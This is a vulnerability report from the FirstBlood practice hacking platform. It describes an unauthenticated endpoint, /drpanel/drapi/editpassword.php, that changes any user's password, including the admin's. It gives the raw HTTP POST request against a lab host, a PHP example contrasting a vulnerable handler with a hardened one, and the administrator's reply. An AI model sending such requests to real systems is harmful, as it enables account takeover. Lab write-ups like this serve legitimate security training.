FirstBlood-#1000 Change Password of admin user
This issue was discovered on FirstBlood v3



On 2022-12-08, ayush1098 Level 8 reported:

Hello Team,

Summary:

From previous hackevents reports, I gathered the /drpanel/drapi/editpassword.php endpoint and it works in this version also. I can change the password of any user (admin in this case) and there is no CSRF protection on this page, so we can exploit easily.

Steps To Reproduce:

  1. Send this request in Burp Suite and you will get the password in response.
POST /drpanel/drapi/editpassword.php HTTP/1.1
Host: ffa62eb87170-ayush1098.a.firstbloodhackers.com
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108", "Google Chrome";v="108"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7
Connection: close
Content-Length: 29

username=admin

Note the username parameter and the Content-Length in the above request.

Impact:

Anyone can change the admin password and can manipulate the user data.

Thanks & Regards, Ayush Singh

P1 CRITICAL

Endpoint: /drpanel/drapi/editpassword.php

Parameter: NA

Payload: NA


FirstBlood ID: 52
Vulnerability Type: Auth issues

The endpoint /drpanel/drapi/editpassword.php still allows an unauthenticated user to modify the password of any account if the username is known. The username was renamed from drAdmin in previous versions to admin.
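For readers studying the bug class, here is an added illustration in PHP (constructed for this write-up, not FirstBlood's own code) of the vulnerable shape next to a hardened handler: the insecure version acts on whatever username is posted with no session check, while the fixed version requires an authenticated session, accepts a posted username only from the admin role, verifies a CSRF token, re-checks the caller's current password and stores a password_hash() without echoing anything back. The $pdo connection returned by db.php, the session keys and the users table columns are assumptions.

```php
<?php
// Added example, not FirstBlood's code. The db.php connection, the session
// keys and the `users` table (id, username, password, role) are assumptions.
// Vulnerable shape: no session check, so any request that names a user can
// set that user's password. This is the class of bug in the report above.
function editPasswordInsecure(PDO $pdo, array $post): void
{
    $stmt = $pdo->prepare('UPDATE users SET password = ? WHERE username = ?');
    $stmt->execute([password_hash($post['password'] ?? '', PASSWORD_DEFAULT),
                    $post['username'] ?? '']);
}

// Hardened shape: returns [http status, message]; never echoes a password.
function editPasswordSecure(PDO $pdo, array $post, array $session): array
{
    // 1. The caller must hold an authenticated session.
    if (empty($session['user_id'])) {
        return [401, 'authentication required'];
    }
    // 2. A state-changing POST needs a CSRF token bound to the session.
    if (!isset($post['csrf_token'], $session['csrf_token'])
        || !hash_equals($session['csrf_token'], $post['csrf_token'])) {
        return [403, 'invalid csrf token'];
    }
    // 3. Authorization: only the admin role may name another account;
    //    everyone else can change only the account behind the session.
    $isAdmin = ($session['role'] ?? '') === 'admin';
    $target  = ($isAdmin && isset($post['username']))
             ? $post['username'] : ($session['username'] ?? '');
    // 4. Re-authenticate the caller with their current password.
    $stmt = $pdo->prepare('SELECT password FROM users WHERE id = ?');
    $stmt->execute([$session['user_id']]);
    $hash = $stmt->fetchColumn();
    if ($hash === false || !password_verify($post['current_password'] ?? '', $hash)) {
        return [403, 'current password incorrect'];
    }
    $new = $post['new_password'] ?? '';
    if (strlen($new) < 12) {
        return [400, 'new password too short'];
    }
    $upd = $pdo->prepare('UPDATE users SET password = ? WHERE username = ?');
    $upd->execute([password_hash($new, PASSWORD_DEFAULT), $target]);
    return $upd->rowCount() === 1 ? [200, 'password updated'] : [404, 'no such user'];
}

// Wiring: db.php is assumed to return the application's PDO connection.
$pdo = require __DIR__ . '/db.php';
session_start();
[$status, $msg] = editPasswordSecure($pdo, $_POST, $_SESSION);
http_response_code($status);
echo $msg;
```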

Report Feedback

@zseano

Creator & Administrator


Congratulations, you were the first to discover this bug! The lack of CSRF protection on this endpoint is something considered informative, as the attacker doesn't need CSRF to gain access (yes, they could lock the admin out, but they could easily regain access).